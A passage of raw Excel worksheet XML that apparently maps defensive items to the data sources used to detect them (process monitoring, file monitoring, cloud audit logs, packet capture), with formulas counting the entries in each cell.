        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C52" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D52" s="53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E52" s="53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F52" s="53"/>
      <c r="G52" s="19"/>
    </row>
    <row r="53" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A53" s="16" t="s">
        <v>125</v>
      </c>
      <c r="B53" s="53" t="str">
        <f>LOOKUP(A53,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Data loss prevention,File monitoring</v>
      </c>
      <c r="C53" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D53" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E53" s="53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F53" s="53"/>
      <c r="G53" s="19"/>
    </row>
    <row r="54" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A54" s="16" t="s">
        <v>127</v>
      </c>
      <c r="B54" s="53" t="str">
        <f>LOOKUP(A54,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C54" s="17" t="s">
        <v>128</v>
      </c>
      <c r="D54" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E54" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F54" s="53"/>
      <c r="G54" s="19"/>
    </row>
    <row r="55" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A55" s="16" t="s">
        <v>129</v>
      </c>
      <c r="B55" s="53" t="str">
        <f>LOOKUP(A55,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C55" s="17" t="s">
        <v>130</v>
      </c>
      <c r="D55" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E55" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F55" s="53"/>
      <c r="G55" s="19"/>
    </row>
    <row r="56" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A56" s="16" t="s">
        <v>131</v>
      </c>
      <c r="B56" s="53" t="str">
        <f>LOOKUP(A56,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,DLL monitoring,Process monitoring,Named Pipes</v>
      </c>
      <c r="C56" s="17" t="s">
        <v>132</v>
      </c>
      <c r="D56" s="53">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E56" s="53">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="F56" s="53"/>
      <c r="G56" s="19"/>
    </row>
    <row r="57" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A57" s="16" t="s">
        <v>133</v>
      </c>
      <c r="B57" s="53" t="str">
        <f>LOOKUP(A57,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Windows event logs,User interface,Process command-line parameters,Process monitoring,PowerShell logs,Loaded DLLs,Kernel drivers,DLL monitoring,Binary file metadata,API monitoring</v>
      </c>
      <c r="C57" s="17" t="s">
        <v>134</v>
      </c>
      <c r="D57" s="53">
        <f t="shared" si="1"/>
        <v>11</v>
      </c>
      <c r="E57" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F57" s="53"/>
      <c r="G57" s="19"/>
    </row>
    <row r="58" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A58" s="16" t="s">
        <v>135</v>
      </c>
      <c r="B58" s="53" t="str">
        <f>LOOKUP(A58,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C58" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D58" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E58" s="53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F58" s="53"/>
      <c r="G58" s="19"/>
    </row>
    <row r="59" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A59" s="16" t="s">
        <v>136</v>
      </c>
      <c r="B59" s="53" t="str">
        <f>LOOKUP(A59,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C59" s="17" t="s">
        <v>137</v>
      </c>
      <c r="D59" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E59" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F59" s="53"/>
      <c r="G59" s="19"/>
    </row>
    <row r="60" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A60" s="16" t="s">
        <v>138</v>
      </c>
      <c r="B60" s="53" t="str">
        <f>LOOKUP(A60,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,PowerShell logs,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C60" s="17" t="s">
        <v>111</v>
      </c>
      <c r="D60" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E60" s="53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F60" s="53"/>
      <c r="G60" s="19"/>
    </row>
    <row r="61" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A61" s="16" t="s">
        <v>139</v>
      </c>
      <c r="B61" s="53" t="str">
        <f>LOOKUP(A61,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network device run-time memory,Network device command history,Network device configuration</v>
      </c>
      <c r="C61" s="17" t="s">
        <v>140</v>
      </c>
      <c r="D61" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E61" s="53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F61" s="53"/>
      <c r="G61" s="19"/>
    </row>
    <row r="62" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A62" s="16" t="s">
        <v>141</v>
      </c>
      <c r="B62" s="53" t="str">
        <f>LOOKUP(A62,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</v>
      </c>
      <c r="C62" s="17" t="s">
        <v>134</v>
      </c>
      <c r="D62" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E62" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F62" s="53"/>
      <c r="G62" s="19"/>
    </row>
    <row r="63" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A63" s="16" t="s">
        <v>142</v>
      </c>
      <c r="B63" s="53" t="str">
        <f>LOOKUP(A63,'REF-DataSources'!A:C)</f>
        <v>System calls</v>
      </c>
      <c r="C63" s="17">
        <v>100</v>
      </c>
      <c r="D63" s="53">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E63" s="53">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F63" s="53"/>
      <c r="G63" s="19"/>
    </row>
    <row r="64" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A64" s="16" t="s">
        <v>143</v>
      </c>
      <c r="B64" s="53" t="str">
        <f>LOOKUP(A64,'REF-DataSources'!A:C)</f>
        <v>System calls</v>
      </c>
      <c r="C64" s="17" t="s">
        <v>144</v>
      </c>
      <c r="D64" s="53">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E64" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F64" s="53"/>
      <c r="G64" s="19"/>
    </row>
    <row r="65" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A65" s="16" t="s">
        <v>145</v>
      </c>
      <c r="B65" s="53" t="str">
        <f>LOOKUP(A65,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C65" s="17" t="s">
        <v>146</v>
      </c>
      <c r="D65" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E65" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F65" s="53"/>
      <c r="G65" s="19"/>
    </row>
    <row r="66" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A66" s="16" t="s">
        <v>147</v>
      </c>
      <c r="B66" s="53" t="str">
        <f>LOOKUP(A66,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C66" s="17" t="s">
        <v>130</v>
      </c>
      <c r="D66" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E66" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F66" s="53"/>
      <c r="G66" s="19"/>
    </row>
    <row r="67" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A67" s="16" t="s">
        <v>148</v>
      </c>
      <c r="B67" s="53" t="str">
        <f>LOOKUP(A67,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C67" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D67" s="53">
        <f t="shared" ref="D67:D130" si="3">LEN(TRIM(B67))-LEN(SUBSTITUTE(TRIM(B67),",",""))+1</f>
        <v>3</v>
      </c>
      <c r="E67" s="53">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F67" s="53"/>
      <c r="G67" s="19"/>
    </row>
    <row r="68" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A68" s="16" t="s">
        <v>149</v>
      </c>
      <c r="B68" s="53" t="str">
        <f>LOOKUP(A68,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C68" s="17" t="s">
        <v>150</v>
      </c>
      <c r="D68" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E68" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F68" s="53"/>
      <c r="G68" s="19"/>
    </row>
    <row r="69" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A69" s="16" t="s">
        <v>151</v>
      </c>
      <c r="B69" s="53" t="str">
        <f>LOOKUP(A69,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,Application logs</v>
      </c>
      <c r="C69" s="17" t="s">
        <v>152</v>
      </c>
      <c r="D69" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E69" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F69" s="53"/>
      <c r="G69" s="19"/>
    </row>
    <row r="70" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A70" s="16" t="s">
        <v>153</v>
      </c>
      <c r="B70" s="53" t="str">
        <f>LOOKUP(A70,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C70" s="17" t="s">
        <v>78</v>
      </c>
      <c r="D70" s="53">
        <f t="shared" si="3"/>
        <v>8</v>
      </c>
      <c r="E70" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F70" s="53"/>
      <c r="G70" s="19"/>
    </row>
    <row r="71" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A71" s="16" t="s">
        <v>154</v>
      </c>
      <c r="B71" s="53" t="str">
        <f>LOOKUP(A71,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,API monitoring,Windows event logs</v>
      </c>
      <c r="C71" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D71" s="53">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E71" s="53">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F71" s="53"/>
      <c r="G71" s="19"/>
    </row>
    <row r="72" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A72" s="16" t="s">
        <v>155</v>
      </c>
      <c r="B72" s="53" t="str">
        <f>LOOKUP(A72,'REF-DataSources'!A:C)</f>
        <v>DNS records,Network protocol analysis,Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C72" s="17" t="s">
        <v>156</v>
      </c>
      <c r="D72" s="53">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E72" s="53">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F72" s="53"/>
      <c r="G72" s="19"/>
    </row>
    <row r="73" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A73" s="16" t="s">
        <v>157</v>
      </c>
      <c r="B73" s="53" t="str">
        <f>LOOKUP(A73,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,File monitoring,Third-party application logs,Windows Registry,Process monitoring,Process use of network,Binary file metadata</v>
      </c>
      <c r="C73" s="17" t="s">
        <v>158</v>
      </c>
      <c r="D73" s="53">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
      <c r="E73" s="53">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="F73" s="53"/>
      <c r="G73" s="19"/>
    </row>
    <row r="74" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A74" s="16" t="s">
        <v>159</v>
      </c>
      <c r="B74" s="53" t="str">
        <f>LOOKUP(A74,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,File monitoring,Third-party application logs,Windows Registry,Process monitoring,Process use of network,Binary file metadata</v>
      </c>
      <c r="C74" s="17" t="s">
        <v>137</v>
      </c>
      <c r="D74" s="53">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
      <c r="E74" s="53">
        <f t="shared" ref="E74:E137" si="4">LEN(TRIM(C74))-LEN(SUBSTITUTE(TRIM(C74),";",""))+1</f>
        <v>3</v>
      </c>
      <c r="F74" s="53"/>
      <c r="G74" s="19"/>
    </row>
    <row r="75" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A75" s="16" t="s">
        <v>160</v>
      </c>
      <c r="B75" s="53" t="str">
        <f>LOOKUP(A75,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C75" s="17" t="s">
        <v>61</v>
      </c>
      <c r="D75" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E75" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F75" s="53"/>
      <c r="G75" s="19"/>
    </row>
    <row r="76" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A76" s="16" t="s">
        <v>161</v>
      </c>
      <c r="B76" s="53" t="str">
        <f>LOOKUP(A76,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C76" s="17">
        <v>100</v>
      </c>
      <c r="D76" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E76" s="53">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F76" s="53"/>
      <c r="G76" s="19"/>
    </row>
    <row r="77" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A77" s="16" t="s">
        <v>162</v>
      </c>
      <c r="B77" s="53" t="str">
        <f>LOOKUP(A77,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C77" s="17" t="s">
        <v>130</v>
      </c>
      <c r="D77" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E77" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F77" s="53"/>
      <c r="G77" s="19"/>
    </row>
    <row r="78" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A78" s="16" t="s">
        <v>163</v>
      </c>
      <c r="B78" s="53" t="str">
        <f>LOOKUP(A78,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C78" s="17" t="s">
        <v>164</v>
      </c>
      <c r="D78" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E78" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F78" s="53"/>
      <c r="G78" s="19"/>
    </row>
    <row r="79" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A79" s="16" t="s">
        <v>165</v>
      </c>
      <c r="B79" s="53" t="str">
        <f>LOOKUP(A79,'REF-DataSources'!A:C)</f>
        <v>AWS CloudTrail logs,Stackdriver logs,Authentication logs,Process monitoring</v>
      </c>
      <c r="C79" s="17" t="s">
        <v>166</v>
      </c>
      <c r="D79" s="53">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E79" s="53">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F79" s="53"/>
      <c r="G79" s="19"/>
    </row>
    <row r="80" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A80" s="16" t="s">
        <v>167</v>
      </c>
      <c r="B80" s="53" t="str">
        <f>LOOKUP(A80,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Authentication logs,AWS CloudTrail logs,Stackdriver logs</v>
      </c>
      <c r="C80" s="17" t="s">
        <v>168</v>
      </c>
      <c r="D80" s="53">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E80" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F80" s="53"/>
      <c r="G80" s="19"/>
    </row>
    <row r="81" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A81" s="16" t="s">
        <v>169</v>
      </c>
      <c r="B81" s="53" t="str">
        <f>LOOKUP(A81,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C81" s="17" t="s">
        <v>166</v>
      </c>
      <c r="D81" s="53">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E81" s="53">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F81" s="53"/>
      <c r="G81" s="19"/>
    </row>
    <row r="82" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A82" s="16" t="s">
        <v>170</v>
      </c>
      <c r="B82" s="53" t="str">
        <f>LOOKUP(A82,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C82" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D82" s="53">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E82" s="53">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F82" s="53"/>
      <c r="G82" s="19"/>
    </row>
    <row r="83" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A83" s="16" t="s">
        <v>171</v>
      </c>
      <c r="B83" s="53" t="str">
        <f>LOOKUP(A83,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C83" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D83" s="53">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E83" s="53">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F83" s="53"/>
      <c r="G83" s="19"/>
    </row>
    <row r="84" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A84" s="16" t="s">
        <v>172</v>
      </c>
      <c r="B84" s="53" t="str">
        <f>LOOKUP(A84,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C84" s="17" t="s">
        <v>61</v>
      </c>
      <c r="D84" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E84" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F84" s="53"/>
      <c r="G84" s="19"/>
    </row>
    <row r="85" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A85" s="16" t="s">
        <v>173</v>
      </c>
      <c r="B85" s="53" t="str">
        <f>LOOKUP(A85,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C85" s="17">
        <v>100</v>
      </c>
      <c r="D85" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E85" s="53">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F85" s="53"/>
      <c r="G85" s="19"/>
    </row>
    <row r="86" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A86" s="16" t="s">
        <v>174</v>
      </c>
      <c r="B86" s="53" t="str">
        <f>LOOKUP(A86,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C86" s="17" t="s">
        <v>175</v>
      </c>
      <c r="D86" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E86" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F86" s="53"/>
      <c r="G86" s="19"/>
    </row>
    <row r="87" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A87" s="16" t="s">
        <v>176</v>
      </c>
      <c r="B87" s="53" t="str">
        <f>LOOKUP(A87,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C87" s="17" t="s">
        <v>177</v>
      </c>
      <c r="D87" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E87" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F87" s="53"/>
      <c r="G87" s="19"/>
    </row>
    <row r="88" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A88" s="16" t="s">
        <v>178</v>
      </c>
      <c r="B88" s="53" t="str">
        <f>LOOKUP(A88,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C88" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D88" s="53">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E88" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F88" s="53"/>
      <c r="G88" s="19"/>
    </row>
    <row r="89" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A89" s="16" t="s">
        <v>179</v>
      </c>
      <c r="B89" s="53" t="str">
        <f>LOOKUP(A89,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C89" s="17" t="s">
        <v>180</v>
      </c>
      <c r="D89" s="53">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E89" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F89" s="53"/>
      <c r="G89" s="19"/>
    </row>
    <row r="90" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A90" s="16" t="s">
        <v>181</v>
      </c>
      <c r="B90" s="53" t="str">
        <f>LOOKUP(A90,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C90" s="17" t="s">
        <v>182</v>
      </c>
      <c r="D90" s="53">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E90" s="53">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="F90" s="53"/>
      <c r="G90" s="19"/>
    </row>
    <row r="91" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A91" s="16" t="s">
        <v>183</v>
      </c>
      <c r="B91" s="53" t="str">
        <f>LOOKUP(A91,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Process use of network,Process monitoring,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C91" s="17" t="s">
        <v>184</v>
      </c>
      <c r="D91" s="53">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E91" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F91" s="53"/>
      <c r="G91" s="19"/>
    </row>
    <row r="92" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A92" s="16" t="s">
        <v>185</v>
      </c>
      <c r="B92" s="53" t="str">
        <f>LOOKUP(A92,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
      <c r="C92" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D92" s="53">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E92" s="53">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F92" s="53"/>
      <c r="G92" s="19"/>
    </row>
    <row r="93" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A93" s="16" t="s">
        <v>186</v>
      </c>
      <c r="B93" s="53" t="str">
        <f>LOOKUP(A93,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
      <c r="C93" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D93" s="53">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E93" s="53">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F93" s="53"/>
      <c r="G93" s="19"/>
    </row>
    <row r="94" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A94" s="16" t="s">
        <v>187</v>
      </c>
      <c r="B94" s="53" t="str">
        <f>LOOKUP(A94,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
      <c r="C94" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D94" s="53">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E94" s="53">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F94" s="53"/>
      <c r="G94" s="19"/>
    </row>
    <row r="95" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A95" s="16" t="s">
        <v>188</v>
      </c>
      <c r="B95" s="53" t="str">
        <f>LOOKUP(A95,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
      <c r="C95" s="17" t="s">
        <v>189</v>
      </c>
      <c r="D95" s="53">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E95" s="53">
        <f t="shared" si="4"/>
        <v>7</v>
      </c>
      <c r="F95" s="53"/>
      <c r="G95" s="19"/>
    </row>
    <row r="96" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A96" s="16" t="s">
        <v>190</v>
      </c>
      <c r="B96" s="53" t="str">
        <f>LOOKUP(A96,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
      <c r="C96" s="17" t="s">
        <v>191</v>
      </c>
      <c r="D96" s="53">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E96" s="53">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="F96" s="53"/>
      <c r="G96" s="19"/>
    </row>
    <row r="97" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A97" s="16" t="s">
        <v>192</v>
      </c>
      <c r="B97" s="53" t="str">
        <f>LOOKUP(A97,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
      <c r="C97" s="17" t="s">
        <v>193</v>
      </c>
      <c r="D97" s="53">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E97" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F97" s="53"/>
      <c r="G97" s="19"/>
    </row>
    <row r="98" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A98" s="16" t="s">
        <v>194</v>
      </c>
      <c r="B98" s="53" t="str">
        <f>LOOKUP(A98,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
      <c r="C98" s="17">
        <v>100</v>
      </c>
      <c r="D98" s="53">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E98" s="53">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F98" s="53"/>
      <c r="G98" s="19"/>
    </row>
    <row r="99" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A99" s="16" t="s">
        <v>195</v>
      </c>
      <c r="B99" s="53" t="str">
        <f>LOOKUP(A99,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows event logs</v>
      </c>
      <c r="C99" s="17" t="s">
        <v>114</v>
      </c>
      <c r="D99" s="53">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E99" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F99" s="53"/>
      <c r="G99" s="19"/>
    </row>
    <row r="100" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A100" s="16" t="s">
        <v>196</v>
      </c>
      <c r="B100" s="53" t="str">
        <f>LOOKUP(A100,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C100" s="17" t="s">
        <v>197</v>
      </c>
      <c r="D100" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E100" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F100" s="53"/>
      <c r="G100" s="19"/>
    </row>
    <row r="101" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A101" s="16" t="s">
        <v>198</v>
      </c>
      <c r="B101" s="53" t="str">
        <f>LOOKUP(A101,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C101" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D101" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E101" s="53">
        <f t="shared" si="4"/>
